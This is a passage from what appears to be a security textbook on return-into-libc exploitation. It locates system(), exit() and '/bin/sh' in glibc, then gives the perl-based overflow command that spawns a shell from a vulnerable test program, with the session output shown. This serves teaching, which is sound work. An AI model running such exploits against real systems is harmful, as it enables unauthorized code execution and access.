Once the system() function is located, the memory is searched in
both directions, looking for the existence of the ???/bin/sh??? string. The ???/bin/sh??? string can be
found embedded in glibc and keeps the attacker in this case from depending on access to
environment variables to complete the attack. Finally, the value is checked to see if it contains
a NULL byte and the location is printed. Youmay customize the preceding program to
look for other objects and strings. Let??™s compile the preceding program and test-drive it.
BT book $
BT book $ gcc -o search -ldl search.c
BT book $ ./search
system() found at b7ed86e0
exit() found at b7ece3a0
"/bin/sh" found at b7fc04c7
A quick check of the preceding gdb value shows the same location for the system() function;
success!
We now have everything required to successfully attack the vulnerable program using
the return into libc exploit. Putting it all together, we see
BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
"\xe0\x86\xed\xb7","BBBB","\xc7\x04\xfc\xb7"'`
sh-3.1$ id
uid=1001(joe) gid=100(users) groups=100(users)
sh-3.1$ exit
exit
Segmentation fault
BT book $
Notice that we got a user level shell (not root) and when we exited from the shell, we got
a segmentation fault.
Pages:
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372